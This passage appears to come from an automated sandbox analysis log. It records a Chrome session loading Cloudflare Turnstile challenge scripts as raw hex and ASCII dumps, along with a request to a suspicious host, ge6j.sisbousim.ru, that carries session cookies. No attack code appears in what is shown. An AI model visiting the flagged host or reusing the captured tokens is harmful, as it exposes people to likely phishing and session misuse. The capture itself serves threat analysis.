                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:58 UTC301INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:58 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 128369
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc912998ce541d9-EWR
                                                                              2024-10-03 01:13:58 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32
                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2
                                                                              2024-10-03 01:13:58 UTC1369INData Raw: 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6c 6f 6e 67 65 72 5f 74 68 61 6e 5f 65 78 70 65 63 74 65 64 22
                                                                              Data Ascii: 3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","turnstile_longer_than_expected"
                                                                              2024-10-03 01:13:58 UTC1369INData Raw: 28 67 48 28 36 37 37 29 29 2f 31 31 29 2c 66 3d 3d 3d 64 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 36 33 32 36 33 31 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 34 36 30 29 5d 2c 65 4f 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 67 4a 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 67 4a 3d 67 49 2c 67 3d 7b 7d 2c 67 5b 67 4a 28 35 33 31 29 5d 3d 67 4a 28 31 30 36 39 29 2c 67 5b 67 4a 28 31 31 39 39 29 5d 3d 67 4a 28 31 33 30 30 29 2c 67 5b 67 4a 28 31 36 38 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2b 73 7d 2c 67 5b 67 4a 28 31 38 39 39 29 5d
                                                                              Data Ascii: (gH(677))/11),f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,632631),eM=this||self,eN=eM[gI(1460)],eO=function(f,gJ,g,h,i,j,k,l,m){for(gJ=gI,g={},g[gJ(531)]=gJ(1069),g[gJ(1199)]=gJ(1300),g[gJ(1683)]=function(n,s){return n+s},g[gJ(1899)]
                                                                              2024-10-03 01:13:58 UTC1369INData Raw: 7d 28 78 29 2c 42 3d 27 6e 41 73 41 61 41 62 27 2e 73 70 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 6f 28 31 30 32 36 29 5d 5b 68 6f 28 32 30 34 37 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 6f 28 31 37 30 33 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 6f 5b 68 6f 28 35 34 35 29 5d 28 66 6c 2c 67 2c 68 2c 44 29 2c 42 28 45 29 3f 28 46 3d 45 3d 3d 3d 27 73 27 26 26 21 67 5b 68 6f 28 31 35 38 30 29 5d 28 68 5b 44 5d 29 2c 68 6f 28 31 35 30 39 29 3d 3d 3d 69 2b 44 3f 73 28 6f 5b 68 6f 28 31 30 35 38 29 5d 28 69 2c 44 29 2c 45 29 3a 46 7c 7c 6f 5b 68 6f 28 31 31 39 38 29 5d 28 73 2c 69 2b 44 2c 68 5b 44 5d 29 29 3a 73 28 6f 5b 68 6f 28 31 30 35 38 29 5d 28 69 2c 44 29 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e 63 74 69 6f 6e 20 73 28 47 2c 48 2c
                                                                              Data Ascii: }(x),B='nAsAaAb'.split('A'),B=B[ho(1026)][ho(2047)](B),C=0;C<x[ho(1703)];D=x[C],E=o[ho(545)](fl,g,h,D),B(E)?(F=E==='s'&&!g[ho(1580)](h[D]),ho(1509)===i+D?s(o[ho(1058)](i,D),E):F||o[ho(1198)](s,i+D,h[D])):s(o[ho(1058)](i,D),E),C++);return j;function s(G,H,
                                                                              2024-10-03 01:13:58 UTC1369INData Raw: 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 79 53 56 4e 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 78 42 42 43 58 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 6e 45 4d 6f 54 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 51 68 67 75 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 4f 56 76 45 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 49 63 50 79 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 56 77 6f 68 77 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75
                                                                              Data Ascii: ction(h,i){return h<i},'ySVNI':function(h,i){return h(i)},'xBBCX':function(h,i){return h<i},'nEMoT':function(h,i){return h&i},'QhguJ':function(h,i){return h-i},'OVvEN':function(h,i){return i|h},'IcPyi':function(h,i){return h<<i},'Vwohw':function(h,i){retu
                                                                              2024-10-03 01:13:58 UTC1369INData Raw: 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 69 32 28 31 37 30 33 29 5d 3b 4a 2b 3d 31 29 69 66 28 64 5b 69 32 28 31 34 33 38 29 5d 28 64 5b 69 32 28 31 38 35 31 29 5d 2c 64 5b 69 32 28 31 38 35 31 29 5d 29 29 7b 69 66 28 4b 3d 69 5b 69 32 28 35 37 37 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 69 32 28 35 31 33 29 5d 5b 69 32 28 31 39 31 32 29 5d 5b 69 32 28 38 33 36 29 5d 28 78 2c 4b 29 7c 7c 28 78 5b 4b 5d 3d 45 2b 2b 2c 42 5b 4b 5d 3d 21 30 29 2c 4c 3d 43 2b 4b 2c 4f 62 6a 65 63 74 5b 69 32 28 35 31 33 29 5d 5b 69 32 28 31 39 31 32 29 5d 5b 69 32 28 38 33 36 29 5d 28 78 2c 4c 29 29 43 3d 4c 3b 65 6c 73 65 20 69 66 28 64 5b 69 32 28 31 31 36 30 29 5d 28 69 32 28 31 30 32 31 29 2c 64 5b 69 32
                                                                              Data Ascii: ='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[i2(1703)];J+=1)if(d[i2(1438)](d[i2(1851)],d[i2(1851)])){if(K=i[i2(577)](J),Object[i2(513)][i2(1912)][i2(836)](x,K)||(x[K]=E++,B[K]=!0),L=C+K,Object[i2(513)][i2(1912)][i2(836)](x,L))C=L;else if(d[i2(1160)](i2(1021),d[i2
                                                                              2024-10-03 01:13:58 UTC1369INData Raw: 28 64 5b 69 32 28 31 32 38 30 29 5d 28 27 27 2c 43 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 69 32 28 35 31 33 29 5d 5b 69 32 28 31 39 31 32 29 5d 5b 69 32 28 38 33 36 29 5d 28 42 2c 43 29 29 7b 69 66 28 64 5b 69 32 28 31 31 33 33 29 5d 28 32 35 36 2c 43 5b 69 32 28 39 36 31 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 49 3d 3d 64 5b 69 32 28 31 32 30 33 29 5d 28 6a 2c 31 29 3f 28 49 3d 30 2c 47 5b 69 32 28 31 38 38 37 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 69 32 28 39 36 31 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 31 2e 32 38 26 4d 7c 48 3c 3c 31 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 69 32 28 31 38 38 37 29 5d 28 64 5b 69 32 28 35 32 38 29 5d 28 6f 2c 48 29
                                                                              Data Ascii: (d[i2(1280)]('',C)){if(Object[i2(513)][i2(1912)][i2(836)](B,C)){if(d[i2(1133)](256,C[i2(961)](0))){for(s=0;s<F;H<<=1,I==d[i2(1203)](j,1)?(I=0,G[i2(1887)](o(H)),H=0):I++,s++);for(M=C[i2(961)](0),s=0;8>s;H=1.28&M|H<<1,I==j-1?(I=0,G[i2(1887)](d[i2(528)](o,H)
                                                                              2024-10-03 01:13:58 UTC1369INData Raw: 31 29 3b 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 69 39 28 31 32 30 38 29 5d 28 32 2c 32 29 2c 47 3d 31 3b 4c 21 3d 47 3b 4d 3d 49 26 48 2c 49 3e 3e 3d 31 2c 64 5b 69 39 28 31 30 37 39 29 5d 28 30 2c 49 29 26 26 28 49 3d 6a 2c 48 3d 6f 28 4a 2b 2b 29 29 2c 4b 7c 3d 47 2a 28 30 3c 4d 3f 31 3a 30 29 2c 47 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4b 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 69 39 28 31 32 30 38 29 5d 28 32 2c 38 29 2c 47 3d 31 3b 47 21 3d 4c 3b 4d 3d 64 5b 69 39 28 31 34 30 34 29 5d 28 48 2c 49 29 2c 49 3e 3e 3d 31 2c 30 3d 3d 49 26 26 28 49 3d 6a 2c 48 3d 64 5b 69 39 28 35 32 38 29 5d 28 6f 2c 4a 2b 2b 29 29 2c 4b 7c 3d 64 5b 69 39 28 31 32 38 32 29 5d 28 64 5b 69 39 28 31 35 31 38 29 5d 28 30 2c 4d 29 3f 31
                                                                              Data Ascii: 1);for(K=0,L=Math[i9(1208)](2,2),G=1;L!=G;M=I&H,I>>=1,d[i9(1079)](0,I)&&(I=j,H=o(J++)),K|=G*(0<M?1:0),G<<=1);switch(K){case 0:for(K=0,L=Math[i9(1208)](2,8),G=1;G!=L;M=d[i9(1404)](H,I),I>>=1,0==I&&(I=j,H=d[i9(528)](o,J++)),K|=d[i9(1282)](d[i9(1518)](0,M)?1
                                                                              2024-10-03 01:13:58 UTC1369INData Raw: 5e 61 32 2e 67 5d 2c 30 3c 50 5b 69 39 28 31 37 30 33 29 5d 29 7b 69 66 28 61 39 2e 68 5b 73 5b 69 39 28 37 35 31 29 5d 28 32 31 2c 61 61 2e 67 29 5d 3d 52 2c 51 3d 50 5b 69 39 28 36 35 34 29 5d 28 29 2c 51 3d 3d 3d 2d 31 29 74 68 72 6f 77 20 52 3b 61 62 2e 68 5b 73 5b 69 39 28 35 34 36 29 5d 28 32 34 39 2c 61 63 2e 67 29 5d 3d 50 5b 69 39 28 36 35 34 29 5d 28 29 2c 61 64 2e 68 5b 31 2e 35 32 5e 61 65 2e 67 5d 5b 69 39 28 36 32 32 29 5d 28 51 29 7d 65 6c 73 65 20 74 68 72 6f 77 20 52 7d 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 69 30 28 31 38 33 32 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 49 28 31 32 35 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 69 6f 2c 67 2c 68 29 7b 68 3d 28 69 6f 3d 67 49 2c 67 3d 7b 7d 2c 67 5b 69 6f 28 31 30 37 38 29 5d 3d 66 75 6e
                                                                              Data Ascii: ^a2.g],0<P[i9(1703)]){if(a9.h[s[i9(751)](21,aa.g)]=R,Q=P[i9(654)](),Q===-1)throw R;ab.h[s[i9(546)](249,ac.g)]=P[i9(654)](),ad.h[1.52^ae.g][i9(622)](Q)}else throw R}}}},g={},g[i0(1832)]=f.h,g}(),eM[gI(1253)]=function(e,io,g,h){h=(io=gI,g={},g[io(1078)]=fun
                                                                              2024-10-03 01:13:58 UTC1369INData Raw: 2c 73 5b 69 72 28 31 39 38 34 29 5d 3d 47 2c 73 5b 69 72 28 37 36 31 29 5d 3d 43 2c 4a 53 4f 4e 5b 69 72 28 39 35 30 29 5d 28 73 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 69 66 28 21 6f 29 72 65 74 75 72 6e 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 6f 5b 69 72 28 31 32 30 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 36 27 3a 43 3d 28 42 3d 7b 7d 2c 42 5b 69 72 28 31 39 38 38 29 5d 3d 65 4d 5b 69 72 28 31 35 31 39 29 5d 5b 69 72 28 31 39 38 38 29 5d 2c 42 5b 69 72 28 31 30 38 38 29 5d 3d 65 4d 5b 69 72 28 31 35 31 39 29 5d 5b 69 72 28 31 30 38 38 29 5d 2c 42 5b 69 72 28 31 38 32 36 29 5d 3d 65 4d 5b 69 72 28 31 35 31 39 29 5d 5b 69 72 28 31 38 32 36 29 5d 2c 42 29 3b 63 6f 6e 74
                                                                              Data Ascii: ,s[ir(1984)]=G,s[ir(761)]=C,JSON[ir(950)](s));continue;case'4':if(!o)return;continue;case'5':o[ir(1201)]=function(){};continue;case'6':C=(B={},B[ir(1988)]=eM[ir(1519)][ir(1988)],B[ir(1088)]=eM[ir(1519)][ir(1088)],B[ir(1826)]=eM[ir(1519)][ir(1826)],B);cont


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.449774104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:58 UTC795OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:58 UTC210INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:58 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              cache-control: max-age=2629800, public
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc9129b3abb7d08-EWR
                                                                              2024-10-03 01:13:58 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.449762188.114.96.34438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:58 UTC1321OUTGET /favicon.ico HTTP/1.1
                                                                              Host: ge6j.sisbousim.ru
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://ge6j.sisbousim.ru/jREPXBM/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: XSRF-TOKEN=eyJpdiI6IkFRS296M3hNM29JeEl3UGhlaXJtdmc9PSIsInZhbHVlIjoiUENjUG1BNVc4bEN4TGhzeDM3cW9YSXp5ZVhkL1daZStoQ0lDOTRMTWxlZ1BwNzJ4N1NBRU9waklUYU5XazhOQmRxZWptNUZXUkowZ04yUUdVTnFCZC9VcWx5Z0RGWm5qTUdIWnBVMnhEVDgrU3BzWXdvNXJBQzFMdUNuazJuamMiLCJtYWMiOiJhNmFkOTU3MWFhZTIxOTE4OWYyM2Y1MzBlNWU3YTU3ZWEwZTE1OTIyNWQzMDM2MTg4ZGYxMDcwODZlMDExMTZlIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InF4TFBlZUFwd0ViMjNyTEg5MzZKc2c9PSIsInZhbHVlIjoiak1xbnJPOU4wR29CS1hyN2VTb3FKQTFzUWgvZCt0eEQwWlRVcjlDY2s2TGNUc2RxTjB6cTV5WDF0bm0vSzVtL0hTYWFqbXovbnRuT2k3OU84VW5oOXp3a2pESjRBcmJab3RNaGc0NGQ4QkZSS0JkaDlzMHBMRFFhSHA4RkJZd2kiLCJtYWMiOiI5ZDcyMTI5MWFkYzQwNWRkOGUwMzExNzU3NTVmNGY5MjhkMGE2NTQ0MGU2NWZmMDIxYTYzMmU0ZmNkMzI5ZWI5IiwidGFnIjoiIn0%3D
                                                                              2024-10-03 01:13:58 UTC660INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 03 Oct 2024 01:13:58 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Cache-Control: max-age=14400
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zZQRG60xCy9TgbQXucSIhcQcAohfQ9Pu%2BGzMBLuQAabo2K51xMlF8RFgASW9uj1KDW3jib2RN9D99FkMwEczc%2FoNzWjnztIXtWV61%2Bf%2FvW%2FPUuKekvyimmtui%2FSz%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Vary: Accept-Encoding
                                                                              Speculation-Rules: "/cdn-cgi/speculation"
                                                                              CF-Cache-Status: HIT
                                                                              Age: 6066
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc9129d0f0443a5-EWR
                                                                              2024-10-03 01:13:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.449775104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:13:58 UTC433OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc91295984a41f3&lang=auto HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:13:59 UTC301INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:13:59 GMT
                                                                              Content-Type: application/javascript; charset=UTF-8
                                                                              Content-Length: 115542
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc9129fff3f19ae-EWR
                                                                              2024-10-03 01:13:59 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                              Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 68 69 73 25 32 30 70 72 6f 62 6c 65 6d 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 22 59 6f 75 72 20 66 65 65 64 62 61 63 6b 20 72 65 70 6f 72 74 20 68 61 73 20 62 65 65 6e 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 73 75 62 6d 69 74 74 65 64 22 2c 22 63 68 65 63 6b 5f 64 65 6c 61 79 73 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 69 73 25 32 30 74 61 6b 69 6e 67 25 32 30 6c 6f 6e 67 65 72 25 32 30 74 68 61 6e 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66
                                                                              Data Ascii: his%20problem%20persists.","feedback_report_output_subtitle":"Your feedback report has been successfully submitted","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22ref
                                                                              2024-10-03 01:13:59 UTC1369INData Raw: 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 39 36 39 38 37 33 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 31 39 31 29 5d 2c 65 4d 5b 67 49 28 39 31 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 67 53 2c 65 29 7b 65 3d 28 67 53 3d 67 49 2c 7b 27 4b 59 6b 41 6e 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 2c 27 62 6f 63 51 68 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 28 68 29 7d 7d 29 3b 74 72 79 7b 72 65 74 75 72 6e 20 65 51 28 63 29 7d 63 61 74 63 68 28 67 29 7b 72 65 74 75 72 6e 20 65 5b 67 53 28 36 30 38 29 5d 28 65 4f 2c 65 5b 67
                                                                              Data Ascii: k;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,969873),eM=this||self,eN=eM[gI(1191)],eM[gI(916)]=function(c,gS,e){e=(gS=gI,{'KYkAn':function(g,h){return g(h)},'bocQh':function(g,h){return g(h)}});try{return eQ(c)}catch(g){return e[gS(608)](eO,e[g
